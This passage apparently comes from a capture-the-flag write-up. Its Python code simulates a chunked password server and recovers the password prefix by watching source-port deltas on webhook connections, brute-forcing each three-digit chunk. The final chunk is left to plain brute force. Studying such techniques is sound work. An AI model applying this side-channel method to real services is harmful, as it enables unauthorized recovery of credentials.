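        # then connect back to the webhook and reveal that source port.
        for i, real in enumerate(self.chunks):
            self._connect()
            if guess[i * self.chunk_len:(i + 1) * self.chunk_len] != real:
                break
        return self._connect()

def chunks_contacted(server, guess):
    base = server.check("x" * 12)  # always wrong: one chunk server, then webhook
    final = server.check(guess)
    return final - base - 1

def recover_prefix(server, n_chunks=4, chunk_len=3):
    # Recover every chunk except the last one from the port deltas alone.
    prefix = ""
    for k in range(1, n_chunks):
        for digits in itertools.product("0123456789", repeat=chunk_len):
            candidate = prefix + "".join(digits)
            guess = candidate.ljust(n_chunks * chunk_len, "x")
            if chunks_contacted(server, guess) > k:
                prefix = candidate
                break
    return prefix

print(recover_prefix(FakePrimary("123456789012")))
```

As in the write-up, the final chunk is left to a plain brute force against the success response, since there is no further chunk server whose extra connection could be observed.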